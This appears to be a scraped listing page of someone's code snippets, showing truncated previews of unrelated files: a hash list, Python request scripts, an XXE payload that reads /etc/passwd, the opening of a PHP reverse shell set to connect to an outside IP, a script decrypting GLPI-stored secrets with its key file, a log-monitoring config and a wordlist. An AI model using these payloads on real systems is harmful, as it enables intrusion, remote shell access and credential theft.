This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0007EDC7D387A1C86422F769DDF45DE4C2FEEDBE21460EACD2F64D2B749A4159A497B6EF0B08252CB24C09DA993DA6F3524CE73B945BA531EB3C7DD4FFC0DFBB,4FCA412AF185EBF793CF3E79E1AF7098E1C3CEACD6B4C43B10252B69174A3217 | |
00428FF15305A21896B63F9C9F83F0495D39E2E835E233CCA8AF690C8D8AFC475B92C982340010280E1EDD07BFB7ADC40B8C82B0AD2972E3FFD0ECA97A5D98E3,F8FD040DE95A6BB9F5A23AE4439761C4BBF65E39E0CFD2A3 | |
004E8483C6E007C8CED7DB6908721B41D8CCFC4E0D5CF0B462EE9905B3B1575248FD017CA159985EA859A1FE4BD100DFC1A5615C3EAAE7F1D4E9507B747B751B,02F509E61567C6E1A7E39E313CF49B8ACBD6C0420B2D64B66C44F1C43E2D1B71 | |
004EE2BD151447E64E7273DCE070EE34E55507E0243F7A044A2F4E81ED5D65653DE63E483FABAB206E96116004F22DDA817ACAD836887685370B8EA20E707B70,69EFDD5E7C83C5DAEA87DC6B17207496D4412E719FCE08EF690C42A8980C84B5 | |
00575EFEE86BAB31F844C82EB42BE8CEB6C50F737A2A0FD78B62402ECEB3B120,F2D0D509462E61125BA4D46C6E26B5F8B9B4783A36800313B1930D261D17A416 | |
0074D9E5776602E629B362073918A43AD0D631800111D0453DB3416D3827C95B81F575B388A6B425E39AC49BCDC2DC8A57AD2207DC726E78544525A83AB4FE08,245ED |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Don't forget to install the required libraries: | |
# BeautifulSoup, rich and requests | |
from rich.console import Console | |
from bs4 import BeautifulSoup | |
console = Console() | |
from requests import get | |
from urllib3 import disable_warnings | |
disable_warnings() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
... .......... .... .... ........... | |
@@@ @@@&&&&&&&& @@@@ /@@@ *@@@&&&&&&&% |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd"> | |
]> | |
<definitions targetNamespace="http://example.org"> | |
<foo>&xxe;</foo> | |
</definitions> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<wsdl:definitions | |
name="SeiWS" | |
targetNamespace="Sei" | |
xmlns="http://schemas.xmlsoap.org/wsdl/" | |
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" | |
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" | |
xmlns:xsd="http://www.w3.org/2001/XMLSchema" | |
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# All Windows Event logs | |
[monitor://C:\Windows\System32\Winevt\Logs\*.evtx] | |
disabled = false | |
index=winevtx |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$encoded_value = base64_decode('Enconded_Base64_String'); | |
$nonce = substr($encoded_value, 0, SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES); | |
$ciphertext = substr($encoded_value, SODIUM_CRYPTO_AEAD_XCHACHA20POLY1305_IETF_NPUBBYTES); | |
$private_key = file_get_contents('glpicrypt.key'); | |
$decrypted = sodium_crypto_aead_xchacha20poly1305_ietf_decrypt($ciphertext, $nonce, $nonce, $private_key); | |
echo "Result: " . $decrypted; | |
?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
set_time_limit (0); | |
$VERSION = "1.0"; | |
$ip = '91.92.241.103'; // CHANGE THIS | |
$port = 88; // CHANGE THIS | |
$chunk_size = 1400; | |
$write_a = null; | |
$error_a = null; | |
$shell = 'uname -a; w; id; /bin/sh -i'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from requests import get, post | |
from rich import print | |
from urllib3 import disable_warnings | |
disable_warnings() | |
import json | |
def main() -> None: | |
request_body = { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
atualizacao | |
Atualizacao | |
atualizacaoH | |
AtualizacaoH | |
atualizacaob | |
AtualizaoB | |
carga | |
Carga | |
erros | |
Erros |
NewerOlder